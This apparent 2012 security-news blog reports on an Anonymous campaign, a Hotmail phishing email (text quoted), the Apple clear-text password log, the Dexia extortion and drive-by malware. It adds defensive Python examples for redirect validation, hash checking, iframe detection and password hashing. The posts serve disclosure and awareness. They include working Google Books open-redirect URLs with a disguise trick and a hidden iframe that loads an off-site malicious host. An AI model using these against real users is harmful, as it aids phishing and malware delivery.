Saturday, May 19, 2012

SQLSentinel v.0.1 released

SQLSentinel is an open-source SQL injection testing tool: an automated scanner that helps find SQL injection flaws in web applications.


The tool includes a web spider and an SQL error finder. It takes the URL of a website, crawls it to find parameters that trigger SQL errors, and when it has finished generates a PDF report listing the URLs found vulnerable.


Download
Thursday, May 17, 2012

Anonymous turns to India, Announced Operation India



The Anonymous group has been involved in many hacking activities. So far we've seen Operation Tunisia, Operation Zimbabwe, Operation Egypt and Operation Iran from this group. Now Anonymous has turned its attention to the subcontinent and announced Operation India. They have also pulled down the websites of the Indian Congress and the Indian Supreme Court. The group announced the operation via its Twitter and YouTube accounts.


The main reason for this operation is a recent censorship order by an Indian court. Many Indian ISPs have blocked popular video sites like Vimeo, torrent sites like The Pirate Bay and file-sharing sites after the court order.


I have also found a press release in which they give their reasons for this operation.


“Message to Noble Citizen of INDIA (Operation India)
“Over fifty years ago, Indian Freedom Fighters laid down their lives for our freedom. In the end, what was it all for? Today our politicians ride slip-shod over our laws, corruption is rampant. If the brutal way Baba Ramdev’s hunger strike was crushed is anything to go by, it would seem that India is now on its way to becoming an undemocratic ‘democracy’.
“Finally, steps were taken to correct this. The Lokpal Bill was created. And what happens? False tapes turn out to discredit those who support this bill, supporters of Baba Ramdev are mercilessly and brutally attacked.
“This needs to stop. The Anons of India and of the world are taking a stand against your lies and against your corruption. We have an agenda:
“# The Complete Removal of Corruption in all its forms, starting from the highest order.
# Ensure Support to Baba Ramdev and Anna Hazare and other Civil minded individuals who have supported the Jan Lokpal Bill.
# Replace all Currency of Rs. 500 & Rs. 1000 with some new Number, so that Black Money will become just pieces of paper.
# Apologise to the people who got affected by the barbaric crackdown.
# Some kind of basic qualification to get elected as MP / MLA or member of any governing body.
# Unique ID no. (like Citizenship) for everything. All data must get stored under a Single ID.
# An investigation into offshore accounts held by Indian Politicians and the Corporates.
# Severe punishment for all the Corrupt officials.
# The clearance of pending court cases in all courts of India swiftly, and fairly.
“Until these demands are met and solutions implemented our attacks will not stop.
You, the government, were elected to listen to the voices of your people. To give them what they ask for. Too long have you ignored the voice of the “common man” which you claim to represent. Anonymous and the people of India are speaking now.”
Wednesday, May 16, 2012

Google Books open redirection Vulnerability



Recently I noticed a vulnerability in Google Books, which has been merged into Google Play. There is an open redirection vulnerability at http://books.google.com/


I have also reported it to the Google security team and got a positive reply, but this vulnerability does not fall within Google's reward program and it still exists on the website.


What is an Open Redirection Vulnerability?


If a website redirects to a URL it has not validated, that is an open redirection vulnerability. An open redirect (or forward) lets an attacker use a popular website's URL to send the victim to a malicious website.
This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.


http://books.google.com/search?btnI&q=http://www.anydomain.com


When a user clicks the above link, he will be redirected to http://www.anydomain.com. The destination can be changed to any redirection URL:



http://books.google.com/search?btnI&q=http://www.gmail.com
http://books.google.com/search?btnI&q=http://www.blogger.com



Change this URL to any URL where you want to redirect visitors.


An attacker can hide this URL among fake tokens and parameters, as below:


http://books.google.com/search?btnI&tok=nsvn34t8nv92 n92v5n 939kgdgfnbsjdfbsfsfsfsfsfsbfsbjfbsjfbs&q=http://www.anydomain.com&tic=238758cci4y7y7vvy3v7 rt73vt3v3vvsmdvbgjgjs


This vulnerability only redirects to .com domains. When I tested a domain with an extension other than .com, it opened a search page for that domain instead.


Although this vulnerability does not fall into the high-risk category, it can be used for phishing or serving malware.
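The fix for the class of bug described above is to validate the redirect target server-side before issuing the 302. The following is an added example written for this post; it is not Google's code and not part of the original article. It assumes a hypothetical web application that takes a `next` parameter naming where to send the user, with an assumed allow-list of hosts; the sample inputs are constructed, and the function rejects the shapes a naive check misses (scheme-relative `//host`, backslash variants, userinfo tricks, non-http schemes).

```python
"""Server-side guard against open redirects (added example, not Google's code).

Assumes a hypothetical application that redirects to a `next` parameter and
is only willing to send users to the hosts in ALLOWED_HOSTS (assumed config).
"""
from urllib.parse import urlsplit

# Hosts this application is willing to redirect to (assumed configuration).
ALLOWED_HOSTS = {"www.example.com", "books.example.com"}
FALLBACK = "/"


def is_safe_redirect(target: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """True only if `target` is a site-relative path or stays on an allow-listed host.

    Rejects the shapes an open-redirect check has to reject, not just the
    obvious absolute URL: scheme-relative (//host), backslash variants that
    browsers normalise to slashes, userinfo tricks (good.com@evil.com),
    non-http schemes such as javascript:, and whitespace/control characters.
    """
    if not target:
        return False
    if any(ord(ch) < 0x21 or ord(ch) == 0x7F for ch in target):
        return False                      # browsers strip these; parse would differ from reality
    normalised = target.replace("\\", "/")
    try:
        parts = urlsplit(normalised)
    except ValueError:                    # e.g. malformed IPv6 literal
        return False
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return False                      # javascript:, data:, etc.
    if parts.netloc:
        # .hostname drops userinfo and port and lowercases, so
        # "http://www.example.com@evil.example/" resolves to evil.example here.
        return parts.hostname in allowed_hosts
    if parts.scheme:
        return False                      # "http:evil.example" has a scheme but no authority
    if normalised.startswith("//"):
        return False                      # empty-authority scheme-relative form
    return normalised.startswith("/")     # plain site-relative path


def redirect_location(target: str) -> str:
    """Value for the Location header: the validated target, or the fallback."""
    return target if is_safe_redirect(target) else FALLBACK


if __name__ == "__main__":
    # Constructed inputs, including the off-site URL shape from the post.
    for candidate in ("/account/settings", "https://www.example.com/page",
                      "http://www.anydomain.com", "//www.anydomain.com",
                      "/\\www.anydomain.com", "javascript:alert(1)"):
        print(f"{candidate!r:40} -> {redirect_location(candidate)}")
```

The allow-list approach (rather than a deny-list of bad hosts) is the point: anything that is not a local path or an explicitly trusted host falls back to the site root, so the hidden-token trick shown above gains nothing.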

Hash Code Verifier, A tool to verify the File Integrity

Recently I saw a nice tool called Hash Code Verifier, developed by the BreakTheSecurity team. It is designed to create and analyze hashes of files, which helps check the integrity of a file downloaded from a server.


Nowadays attackers bind trojans to software and upload it on the internet, so most download websites also publish an MD5 or SHA hash of the file, so that users can ensure a file has not been modified by checking its hash value.

Features:

  1. Verify the hash of a file
  2. Calculate hashes for multiple files
  3. Compare two files
  4. Simply drag and drop files from your computer into the application to generate hashes
  5. Supports MD5, SHA1, SHA256, SHA512 and CRC32 hash codes
  6. Save the generated hash list in text/HTML format
  7. Automatically generates hashes when you browse to or drop files
  8. Cross-platform (you can use this application on any operating system)
Download Here:
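To make the feature list concrete, here is the same set of operations (hash one file, hash many, compare two files, check files against a published hash list) done in Python. This is an added example, not the Hash Code Verifier's own code; the sample files are constructed in a temporary directory so it runs offline, and the `sha256sum`-style list format it parses is assumed as the shape of a "published hash" file.

```python
"""File-integrity checks as a script (added example, not the tool's code)."""
import hashlib
import hmac
import os
import tempfile
import zlib

CHUNK = 1 << 16   # read 64 KiB at a time so large downloads are not loaded whole
SUPPORTED = ("md5", "sha1", "sha256", "sha512", "crc32")   # the algorithms the post lists


def digest_bytes(data: bytes, algorithm: str = "sha256") -> str:
    """Hex digest of an in-memory buffer (CRC32 is not in hashlib, so zlib is used)."""
    if algorithm == "crc32":
        return f"{zlib.crc32(data) & 0xFFFFFFFF:08x}"
    return hashlib.new(algorithm, data).hexdigest()


def file_digest(path: str, algorithm: str = "sha256") -> str:
    """Streaming hex digest of a file."""
    if algorithm not in SUPPORTED:
        raise ValueError(f"unsupported algorithm: {algorithm}")
    if algorithm == "crc32":
        crc = 0
        with open(path, "rb") as fh:
            for chunk in iter(lambda: fh.read(CHUNK), b""):
                crc = zlib.crc32(chunk, crc)
        return f"{crc & 0xFFFFFFFF:08x}"
    h = hashlib.new(algorithm)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_digest(path: str, expected: str, algorithm: str = "sha256") -> bool:
    """Compare the file's digest to a published value in constant time."""
    return hmac.compare_digest(file_digest(path, algorithm), expected.strip().lower())


def files_identical(path_a: str, path_b: str) -> bool:
    """'Compare two files': identical SHA-256 digests mean identical content."""
    return file_digest(path_a) == file_digest(path_b)


def parse_sum_file(text: str) -> dict:
    """Parse sha256sum/md5sum style lines: '<hex>  <name>' or '<hex> *<name>' (assumed format)."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        entries[name.lstrip(" *")] = digest.lower()
    return entries


def verify_sum_file(directory: str, text: str, algorithm: str = "sha256") -> dict:
    """Like `sha256sum -c`: {name: True/False}; a missing file counts as failed."""
    results = {}
    for name, digest in parse_sum_file(text).items():
        path = os.path.join(directory, name)
        results[name] = os.path.isfile(path) and verify_digest(path, digest, algorithm)
    return results


def demo() -> dict:
    """Run the checks on two constructed files: an original and a copy with one extra byte."""
    with tempfile.TemporaryDirectory() as d:
        good, bad = os.path.join(d, "setup.bin"), os.path.join(d, "setup-tampered.bin")
        with open(good, "wb") as fh:
            fh.write(b"installer payload\n" * 5000)
        with open(bad, "wb") as fh:
            fh.write(b"installer payload\n" * 5000 + b"\x90")   # one appended byte
        # A "published" list that only knows the genuine file's digest.
        published = f"{file_digest(good)}  setup.bin\n{file_digest(good)} *setup-tampered.bin\n"
        report = verify_sum_file(d, published)
        return {
            "good_ok": report["setup.bin"],
            "tampered_ok": report["setup-tampered.bin"],
            "identical": files_identical(good, bad),
            "crc32": file_digest(good, "crc32"),
        }


if __name__ == "__main__":
    print(demo())
```

Two details matter in practice: the digest is computed in chunks so a multi-gigabyte download does not have to fit in memory, and the comparison uses `hmac.compare_digest` so that checking a supplied hash does not leak how many leading characters matched. CRC32 is included because the tool lists it, but it is an error-detection code, not a cryptographic hash, so a published CRC32 cannot protect against deliberate tampering.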

Monday, May 14, 2012

"Your Account Has Been Blocked," New Hotmail Phishing



Hotmail users are advised not to open any kind of account alert email. A new phishing attack is trying to steal the login details of Hotmail users. Users are receiving an email entitled “E-mail account alert!” which warns that their account has been blocked. It also contains a link to verify and unblock the account. Clicking the link takes users to a website that asks them to enter their login details.


The message in the email reads:
This e-mail has been sent to you by Hotmail to inform you that your account has been blocked.
Why are you seeing this? Someone may have used your account to send out a lot of junk messages (or something else that violates the Windows Live Terms of Service). We're here to help you get your account back. What do you need to do?
We'll ask you to login to our secured activation page by following the link below and re-activate your account.
[Link to phishing website]
If you have already confirmed your account information then please disregard this message.


Users who fall for the scam and click the link are taken to a fake web page carrying a copy of the Windows Live login form. If the user enters a login ID and password, he is then forwarded to the legitimate website.


This is not a new scam for Hotmail users. We have already seen many phishing scams for Gmail, Facebook, Windows Live and Hotmail. Users only need to check the link before entering their login details.
Saturday, May 12, 2012

Orion Browser Dumper v1.0 released


Jean-Pierre LESUEUR (DarkCoderSc) has released another browser forensic tool for the community, called "Orion Browser Dumper v1.0".


This software is an advanced local browser history extractor (dumper). In a few seconds (as with Browser Forensic Tool) it extracts the whole history content of the most popular web browsers, currently Internet Explorer, Mozilla Firefox, Google Chrome, COMODO Dragon, RockMelt and Opera.



The software also lets you edit the default keywords and, of course, add or modify your own. To separate keyword subjects you can create your own keyword categories and scan only for the keywords in a chosen category.


The program is fully asynchronous, so it won't affect your work during the scan, nor will it block the customization of keywords and keyword lists, and it can be cancelled at any time.
Note that this software will in no case alter the data: it only opens all history, even archived history, read-only and in the background.



Download and Read More
Monday, May 7, 2012

Apple Latest Update exposes passwords in clear text



Apple has just released the new Lion security update, Mac OS X 10.7.3, which accidentally exposes passwords in clear text. The update writes a debug log file, stored outside the encrypted area, that records users' passwords in clear text. This log file contains the password of every user who has logged in since the update was applied.


The flaw was found by security researcher David Emery, who published his findings on Cryptome. He also reported that the log file can be accessed by booting the machine into FireWire disk mode and reading it by opening the drive as a disk, or by booting the new-with-Lion recovery partition and using the available superuser shell to mount the main file system partition and read the file.


Because the log file lies outside the encrypted area, anyone with root access can read it and obtain the usernames and passwords of other users, and so access everything secured with those credentials.


One can partially protect oneself against the FireWire disk and recovery partition attacks by using FileVault 2 (whole-disk encryption), which requires knowing at least one user's login password before any files on the main partition can be accessed.


But users who still use FileVault (rather than FileVault 2) remain vulnerable and can lose their encrypted data, because the password is left unencrypted. If the hard drive is stolen, it does not matter that the backups require a key to read: the backed-up log file contains the required password in clear text.
Sunday, May 6, 2012

What is Drive by Download Malware?



There are many posts on my blog about malware that uses the Drive-by Download method to infect systems on the internet, but the method itself seems confusing to many people. This is a requested post, written for those who have mailed me about it.

Drive-by Download is a method some malware uses to infect and spread; it is not a type of malware. We visit many websites daily, and some of them trick users into downloading malicious software that claims to be something else. Sometimes a website uses pop-ups to spread this type of infection: suppose a pop-up shows a simple message and two buttons, yes and no, and clicking either button starts downloading code onto your system. Such infected pages often use iframe code to evade antivirus detection.

Drive-by downloads continue to be a major security issue online. Much malware and spyware uses this trick to spread and infect computers on the internet. Google also now takes the issue seriously and warns users who try to visit such a website from Google search results.
According to the security company Sophos, more than 10,000 newly infected pages appear daily, spreading different kinds of malware with this method.

Many of these infections are connected to botnets, in which each PC is turned into a zombie that may then be directed to further malicious activity, such as spam or DDoS attacks.

Drive-by install is a similar kind of attack, in which a website tricks users into installing some tool on the system. You may have seen toolbars appear in your browser that you never installed; these are a perfect example. Such toolbars are a kind of adware that changes your homepage and keeps opening pop-ups on your computer.

How to avoid drive-by downloads
To minimize the risk of drive-by downloads, keep your web browser and your internet security software updated at all times, install all Windows patches as soon as they are released, and don't click links in unsolicited or otherwise dubious e-mails.

New Drive By Download Malware Notcom Infecting Android Devices

A new Android malware, Notcom (NotCompatible), has been discovered infecting Android users by drive-by download when they visit certain malicious websites. These websites contain a hidden iframe whose target checks the User-Agent string of each visitor's request.
The iframe code is:
<iframe style=”visibility: hidden; display: none; display: none;” src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>



If it finds an Android visitor, it redirects the device to download a malicious Android package (APK).
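For a site owner, the visible artefact of this infection is the injected iframe itself: hidden by CSS (or sized to nothing) and pointing off-site. The following is an added example of a static check for that pattern over a page's HTML; it is not Lookout's code and not part of the original post. The sample page is constructed and reuses the iframe the post quotes, with the defanged `hxxp` written as `http` so the parser sees a real URL; the site host passed in is assumed.

```python
"""Flag iframes that are both concealed and off-site (added example, not Lookout's code)."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

HIDING_RULES = ("display:none", "visibility:hidden")


def _hidden_by_style(style: str) -> bool:
    """True if the inline style contains one of the concealment rules."""
    compact = style.replace(" ", "").lower()
    return any(rule in compact for rule in HIDING_RULES)


def _tiny(attrs: dict) -> bool:
    """width/height of 0 or 1 pixel: invisible without any CSS at all."""
    try:
        return int(attrs.get("width", "100")) <= 1 and int(attrs.get("height", "100")) <= 1
    except ValueError:
        return False


class IframeAuditor(HTMLParser):
    """Collects iframes that are concealed AND point to a host other than the site's."""

    def __init__(self, site_host: str):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "")
        host = urlsplit(src).hostname          # None for a relative src
        off_site = bool(host) and host != self.site_host
        reasons = []
        if _hidden_by_style(a.get("style", "")):
            reasons.append("hidden by CSS")
        if _tiny(a):
            reasons.append("zero-size frame")
        # Concealed plus off-site is the drive-by shape; a visible embed or a
        # hidden same-site frame is ordinary page markup and is not reported.
        if reasons and off_site:
            reasons.append(f"off-site host {host}")
            self.findings.append({"line": self.getpos()[0], "src": src, "reasons": reasons})


def find_hidden_iframes(html: str, site_host: str) -> list:
    """Return the suspicious iframes in `html`, with line numbers and reasons."""
    auditor = IframeAuditor(site_host)
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed sample page; line 4 is the iframe quoted in the post (hxxp -> http).
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="https://www.example.com/widget" width="300" height="200"></iframe>
<iframe style="visibility: hidden; display: none; display: none;" src="http://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>
<iframe src="http://cdn.example.net/pixel" width="0" height="0"></iframe>
</body></html>"""


if __name__ == "__main__":
    for finding in find_hidden_iframes(SAMPLE_PAGE, "www.example.com"):
        print(f"line {finding['line']}: {finding['src']}  ({', '.join(finding['reasons'])})")
```

Because the redirect behind the iframe only fires for Android User-Agent strings, fetching the iframe's target from a desktop will not reproduce the APK download; the iframe in the page source, however, is present for every visitor, which is why scanning the served HTML is the practical check.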


This malware does not install automatically; it expects the user to download and install it, and it tries to disguise itself as a security update.


For the infection to succeed, the device must have the “Unknown sources” setting enabled (commonly referred to as “sideloading”). If the setting is not enabled, the installation will be blocked.


According to the Lookout Mobile Security analysis report:
"NotCompatible is a new Android trojan that appears to serve as a simple TCP relay / proxy while posing as a system update. This threat does not currently appear to cause any direct harm to a target device, but could potentially be used to gain illicit access to private networks by turning an infected Android device into a proxy. As previously mentioned, this appears to be the first time that compromised websites have been used to distribute malware targeting Android devices."


Unlike many other Android trojans, this one only requests network permissions to access the internet; its intention does not appear to be collecting your contacts, SMS messages, email or other personal details.


All Android users are advised not to download Android apps from unknown sources; install only from the Google Play store or a trusted vendor. Use only trusted security updates and never chase free "security updates", which may be malware.

Download Browser Forensic Tool v2.0


Browser Forensic Tool v2.0 is an advanced local browser history search engine. It searches for and extracts the URLs matching chosen keywords from all the popular web browsers, currently Internet Explorer, Google Chrome, Mozilla Firefox, RockMelt, Comodo Dragon and Opera.

The program looks through the history titles and search URLs for the chosen keyword(s). If a keyword is found in a title or search URL, the entry is displayed in the search result list with its URL and title.

The software also lets you edit the default keywords and, of course, add or modify your own. To separate keyword subjects you can create your own keyword categories and scan only for the keywords in a chosen category.

The program is fully asynchronous, so it won't affect your work during the scan, nor will it block the customization of keywords and keyword lists, and it can be cancelled at any time.

Note that this software will in no case alter the data: it only opens all history, even archived history, read-only and in the background.
Friday, May 4, 2012

Hackers Blackmail Dexia Bank, demanded $196,000 for not to leak data



A group of hackers has released a statement in which they claim to have broken into the servers of Elantis, a Belgian credit provider owned by Dexia. They also demanded that the bank pay 150,000 EUR ($196,000) before May 4, or they will leak all the customer data.

"In addition to database tables containing data such as internal login credentials, we downloaded numerous tables which contain Internet loan applications, as well as fully-processed applications. Those tables hold highly-sensitive data such as the applicants' full names, their jobs, ID card numbers, contact information and details about their income," the hackers posted online.

The hackers also claim that they are not blackmailing anyone; they are just demanding an "idiot tax" from the bank for leaving sensitive data unprotected on the company server.

"It is worth pointing out that this data was left unprotected and unencrypted on Elantis' servers," the hackers say in the statement, adding: "While this could be called 'blackmail,' we prefer to think of it as an 'idiot tax' for leaving confidential data unprotected on a Web server."

“The only question that remains now is this -- After they carelessly treated their clients' data, will Dexia act to prevent their clients' data from being published online, or is their clients' confidentiality worth less to them than EUR 150,000?” they added.

They have also posted a small part of the obtained data to prove that their claim is not just a statement. The hackers also claimed that Elantis took down its public-facing website after the breach, which is correct: the website is still offline.

The bank has also confirmed the data breach and said that it is investigating the incident. The bank has told the press that it is not prepared to pay, and that it does not like blackmail.

Insecure Cryptographic Storage Vulnerability on Web Applications



This vulnerability exists in web applications because of developers' lack of knowledge. Most organizations use web applications to manage their tasks, and every company is now putting its confidential documents online. But sometimes these applications, designed to access and manage data, fail to protect it, and the result is data leakage.


The most common problem with web applications is that developers do not take care of the security of the data. Most of the time, passwords are stored in plain text or protected with some weak encryption. This is not safe: it can lead to data exposure if the database leaks.


Developers must try to protect data as much as they can. These flaws can lead to the disclosure of sensitive data and information, which may harm an organization. If this vulnerability exists in an e-commerce website, it may harm the website's users more than the company running it.
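The password case is the most common instance of this vulnerability, so here is what "stored in plain text or with some poor encryption" looks like next to the storage a leaked database can survive. This is an added example, not code from the Infosec Institute article linked below: the "before" functions show the two habits the post warns about, and the "after" uses salted, iterated PBKDF2-HMAC-SHA256 from Python's standard library (the round count is an assumed tuning value) with a constant-time comparison. The user records are constructed.

```python
"""Insecure versus safer password storage (added example, not from the linked article)."""
import base64
import hashlib
import hmac
import os


# --- what the post warns about ---------------------------------------------
def store_plaintext(password: str) -> str:
    return password                                   # readable by anyone who obtains the table


def store_unsalted_md5(password: str) -> str:
    # Fast and unsalted: equal passwords give equal hashes, and precomputed
    # tables recover common ones instantly once the table leaks.
    return hashlib.md5(password.encode("utf-8")).hexdigest()


# --- salted, slow, per-user --------------------------------------------------
PBKDF2_ROUNDS = 600_000          # assumed tuning value; raise it as hardware gets faster
SALT_BYTES = 16


def hash_password(password: str, rounds: int = PBKDF2_ROUNDS) -> str:
    """Return 'pbkdf2_sha256$<rounds>$<salt b64>$<key b64>' for the user table."""
    salt = os.urandom(SALT_BYTES)                     # fresh per user, so equal passwords differ
    key = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    return "$".join(["pbkdf2_sha256", str(rounds),
                     base64.b64encode(salt).decode("ascii"),
                     base64.b64encode(key).decode("ascii")])


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and rounds; compare without timing leaks."""
    try:
        algo, rounds, salt_b64, key_b64 = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        salt = base64.b64decode(salt_b64, validate=True)
        expected = base64.b64decode(key_b64, validate=True)
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(rounds))
    except (ValueError, TypeError):
        return False                                  # malformed record: never "accept"
    return hmac.compare_digest(candidate, expected)


def duplicate_password_users(table: dict) -> set:
    """Users whose stored value equals another user's. Visible for plaintext and
    unsalted MD5 tables; impossible to see in a salted table."""
    seen, dupes = {}, set()
    for user, stored in table.items():
        if stored in seen:
            dupes.update({user, seen[stored]})
        seen[stored] = user
    return dupes


def demo(rounds: int = PBKDF2_ROUNDS) -> dict:
    """Store constructed users three ways and show what a leaked table reveals."""
    users = {"alice": "Winter2012!", "bob": "Winter2012!", "carol": "s3cret"}   # constructed
    plain_table = {u: store_plaintext(p) for u, p in users.items()}
    md5_table = {u: store_unsalted_md5(p) for u, p in users.items()}
    kdf_table = {u: hash_password(p, rounds) for u, p in users.items()}
    return {
        "plaintext_reveals_shared": duplicate_password_users(plain_table),
        "md5_reveals_shared": duplicate_password_users(md5_table),
        "kdf_reveals_shared": duplicate_password_users(kdf_table),
        "login_ok": verify_password("Winter2012!", kdf_table["alice"]),
        "login_bad": verify_password("winter2012!", kdf_table["alice"]),
    }


if __name__ == "__main__":
    print(demo())
```

The record format carries its own salt and round count, so the cost can be raised later for new passwords without breaking verification of existing ones, and `compare_digest` keeps the check from leaking how many bytes of the derived key matched.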



Read the full article, written by me, on the Infosec Institute page:

Insecure Cryptographic Storage on Web Applications

Interested in learning Web Application Penetration Testing? We recommend the course:

 "Web Application Penetration Testing"